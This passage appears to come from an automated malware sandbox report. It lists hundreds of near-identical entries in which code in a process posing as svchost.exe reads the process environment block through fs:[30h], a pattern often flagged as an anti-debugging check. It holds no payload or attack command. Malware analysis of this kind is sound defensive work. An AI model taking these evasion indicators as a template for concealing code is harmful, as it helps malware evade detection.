            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE3DB mov eax, dword ptr fs:[00000030h]1_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD43D4 mov eax, dword ptr fs:[00000030h]1_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC3CD mov eax, dword ptr fs:[00000030h]1_2_02FEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]1_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]1_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB63C0 mov eax, dword ptr fs:[00000030h]1_2_02FB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0300625D mov eax, dword ptr fs:[00000030h]1_2_0300625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]1_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]1_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]1_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD437C mov eax, dword ptr fs:[00000030h]1_2_02FD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov ecx, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]1_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FFA352 mov eax, dword ptr fs:[00000030h]1_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD8350 mov ecx, dword ptr fs:[00000030h]1_2_02FD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]1_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030062D6 mov eax, dword ptr fs:[00000030h]1_2_030062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C310 mov ecx, dword ptr fs:[00000030h]1_2_02F2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F50310 mov ecx, dword ptr fs:[00000030h]1_2_02F50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]1_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]1_2_02F2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F720F0 mov ecx, dword ptr fs:[00000030h]1_2_02F720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_02F2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F380E9 mov eax, dword ptr fs:[00000030h]1_2_02F380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB60E0 mov eax, dword ptr fs:[00000030h]1_2_02FB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB20DE mov eax, dword ptr fs:[00000030h]1_2_02FB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov eax, dword ptr fs:[00000030h]1_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]1_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F280A0 mov eax, dword ptr fs:[00000030h]1_2_02F280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC80A8 mov eax, dword ptr fs:[00000030h]1_2_02FC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004164 mov eax, dword ptr fs:[00000030h]1_2_03004164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004164 mov eax, dword ptr fs:[00000030h]1_2_03004164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3208A mov eax, dword ptr fs:[00000030h]1_2_02F3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5C073 mov eax, dword ptr fs:[00000030h]1_2_02F5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32050 mov eax, dword ptr fs:[00000030h]1_2_02F32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB6050 mov eax, dword ptr fs:[00000030h]1_2_02FB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6030 mov eax, dword ptr fs:[00000030h]1_2_02FC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A020 mov eax, dword ptr fs:[00000030h]1_2_02F2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C020 mov eax, dword ptr fs:[00000030h]1_2_02F2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]1_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030061E5 mov eax, dword ptr fs:[00000030h]1_2_030061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4000 mov ecx, dword ptr fs:[00000030h]1_2_02FB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD2000 mov eax, dword ptr fs:[00000030h]1_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F601F8 mov eax, dword ptr fs:[00000030h]1_2_02F601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]1_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF61C3 mov eax, dword ptr fs:[00000030h]1_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB019F mov eax, dword ptr fs:[00000030h]1_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2A197 mov eax, dword ptr fs:[00000030h]1_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F70185 mov eax, dword ptr fs:[00000030h]1_2_02F70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEC188 mov eax, dword ptr fs:[00000030h]1_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD4180 mov eax, dword ptr fs:[00000030h]1_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F2C156 mov eax, dword ptr fs:[00000030h]1_2_02F2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC8158 mov eax, dword ptr fs:[00000030h]1_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36154 mov eax, dword ptr fs:[00000030h]1_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov ecx, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC4144 mov eax, dword ptr fs:[00000030h]1_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60124 mov eax, dword ptr fs:[00000030h]1_2_02F60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov ecx, dword ptr fs:[00000030h]1_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDA118 mov eax, dword ptr fs:[00000030h]1_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF0115 mov eax, dword ptr fs:[00000030h]1_2_02FF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov eax, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDE10E mov ecx, dword ptr fs:[00000030h]1_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]1_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB06F1 mov eax, dword ptr fs:[00000030h]1_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]1_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]1_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F666B0 mov eax, dword ptr fs:[00000030h]1_2_02F666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]1_2_02F6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F34690 mov eax, dword ptr fs:[00000030h]1_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F62674 mov eax, dword ptr fs:[00000030h]1_2_02F62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FF866E mov eax, dword ptr fs:[00000030h]1_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6A660 mov eax, dword ptr fs:[00000030h]1_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4C640 mov eax, dword ptr fs:[00000030h]1_2_02F4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E627 mov eax, dword ptr fs:[00000030h]1_2_02F4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F66620 mov eax, dword ptr fs:[00000030h]1_2_02F66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68620 mov eax, dword ptr fs:[00000030h]1_2_02F68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3262C mov eax, dword ptr fs:[00000030h]1_2_02F3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72619 mov eax, dword ptr fs:[00000030h]1_2_02F72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAE609 mov eax, dword ptr fs:[00000030h]1_2_02FAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4260B mov eax, dword ptr fs:[00000030h]1_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F347FB mov eax, dword ptr fs:[00000030h]1_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F527ED mov eax, dword ptr fs:[00000030h]1_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]1_2_02FBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]1_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB07C3 mov eax, dword ptr fs:[00000030h]1_2_02FB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F307AF mov eax, dword ptr fs:[00000030h]1_2_02F307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE47A0 mov eax, dword ptr fs:[00000030h]1_2_02FE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FD678E mov eax, dword ptr fs:[00000030h]1_2_02FD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38770 mov eax, dword ptr fs:[00000030h]1_2_02F38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40770 mov eax, dword ptr fs:[00000030h]1_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30750 mov eax, dword ptr fs:[00000030h]1_2_02F30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBE75D mov eax, dword ptr fs:[00000030h]1_2_02FBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72750 mov eax, dword ptr fs:[00000030h]1_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FB4755 mov eax, dword ptr fs:[00000030h]1_2_02FB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov esi, dword ptr fs:[00000030h]1_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6674D mov eax, dword ptr fs:[00000030h]1_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov ecx, dword ptr fs:[00000030h]1_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6273C mov eax, dword ptr fs:[00000030h]1_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FAC730 mov eax, dword ptr fs:[00000030h]1_2_02FAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C720 mov eax, dword ptr fs:[00000030h]1_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30710 mov eax, dword ptr fs:[00000030h]1_2_02F30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F60710 mov eax, dword ptr fs:[00000030h]1_2_02F60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6C700 mov eax, dword ptr fs:[00000030h]1_2_02F6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004500 mov eax, dword ptr fs:[00000030h]1_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F304E5 mov ecx, dword ptr fs:[00000030h]1_2_02F304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F644B0 mov ecx, dword ptr fs:[00000030h]1_2_02F644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]1_2_02FBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F364AB mov eax, dword ptr fs:[00000030h]1_2_02F364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FEA49A mov eax, dword ptr fs:[00000030h]1_2_02FEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5A470 mov eax, dword ptr fs:[00000030h]1_2_02F5A470
